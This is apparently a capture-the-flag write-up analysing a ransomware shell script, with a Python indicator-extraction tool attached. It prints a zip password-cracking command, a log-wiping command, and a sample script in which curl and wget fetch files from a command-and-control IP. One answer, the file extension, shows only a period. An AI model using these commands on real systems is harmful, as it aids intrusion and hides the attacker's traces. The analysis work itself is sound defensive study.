Malware Analysis - Ransomware Script

What is the malicious IP address referenced multiple times in the script? (1 point)

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u 'Recovered Script File.zip'
185.141.25.168

The script uses apt-get to retrieve two tools, and uses yum to install them. What is the command line to remove the yum logs afterwards? (1 point)

rm -rf /var/log/yum*

A message is created in the file /etc/motd. What are the first three words? (1 point)

you were hacked

This message also contains a contact email address to have the system fixed. What is it? (1 point)

nationalsiense@protonmail.com

When files are encrypted, an unusual file extension is used. What is it? (2 points)

.

There are 5 functions associated with the encryption process that start with ‘encrypt’. What are they, in the order they’re presented in the script? (do not include "()") (2 points)

encrypt_ssh, encrypt_grep_files, encrypt_home, encrypt_root, encrypt_db

The script will check a text file hosted on the C2 server. What is the full URL of this file? (2 points)

http://185.141.25.168/check_attack/0.txt
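Every answer above comes from static triage of the recovered script: counting IP literals to find the C2, pulling URLs and contact addresses, listing the encrypt* functions in definition order, and spotting log wiping and the /etc/motd tamper. The script below is an added example (not part of this writeup and not the challenge file) that automates that triage over a constructed stand-in script; the IOC values in the sample are the ones this page reports, the function bodies are inert placeholders, and the second URL (loader.sh) and the curl/wget lines are assumptions made up for the sample.

```python
import re
from collections import Counter

# Constructed sample of a ransomware-style shell script (NOT the challenge's
# actual file). Indicators mirror those reported in the writeup; the function
# bodies are inert placeholders and the loader.sh URL is an invented extra.
SAMPLE_SCRIPT = r"""#!/bin/bash
C2="185.141.25.168"
apt-get install -y curl openssl
yum install -y curl openssl
rm -rf /var/log/yum*
echo "you were hacked - mail nationalsiense@protonmail.com to fix it" > /etc/motd
encrypt_ssh() { :; }
encrypt_grep_files() { :; }
function encrypt_home { :; }
encrypt_root() { :; }
encrypt_db() { :; }
curl -s "http://185.141.25.168/check_attack/0.txt" -o /tmp/0.txt
wget -q http://185.141.25.168/loader.sh
"""

# Dotted-quad IPv4 literal with each octet limited to 0-255.
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Matches both POSIX "name() {" and bash "function name {" definitions,
# so findall() yields function names in the order they appear in the file.
FUNC_RE = re.compile(
    r"^\s*(?:function\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*(?:\(\s*\))?\s*\{", re.M
)

# Behaviours a defender wants flagged during triage (hypothetical labels).
SUSPICIOUS = {
    "log_wiping": re.compile(r"\brm\s+-rf?\s+/var/log"),
    "motd_tamper": re.compile(r">\s*/etc/motd\b"),
    "package_install": re.compile(r"\b(?:apt-get|yum)\s+install\b"),
}


def ip_references(text):
    """Count every IPv4 literal; the most frequent one is the likely C2."""
    return Counter(IPV4_RE.findall(text))


def urls(text):
    return URL_RE.findall(text)


def emails(text):
    return sorted(set(EMAIL_RE.findall(text)))


def functions_with_prefix(text, prefix="encrypt"):
    """Function names starting with `prefix`, in definition order."""
    return [name for name in FUNC_RE.findall(text) if name.startswith(prefix)]


def triage(text):
    """Collect the IOCs and behaviour flags for one script into a report dict."""
    ips = ip_references(text)
    c2, hits = ips.most_common(1)[0] if ips else (None, 0)
    return {
        "c2_ip": c2,
        "c2_ip_references": hits,
        "urls": urls(text),
        "emails": emails(text),
        "encrypt_functions": functions_with_prefix(text),
        "flags": sorted(k for k, rx in SUSPICIOUS.items() if rx.search(text)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

To run it against a real recovered script, read the file into a string and pass it to triage(); because the function regex only recognises definition lines, calls such as `encrypt_home "$d"` are not double-counted, and the IP counter deliberately includes IPs embedded in URLs, which is what makes the C2 stand out as the most referenced address.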
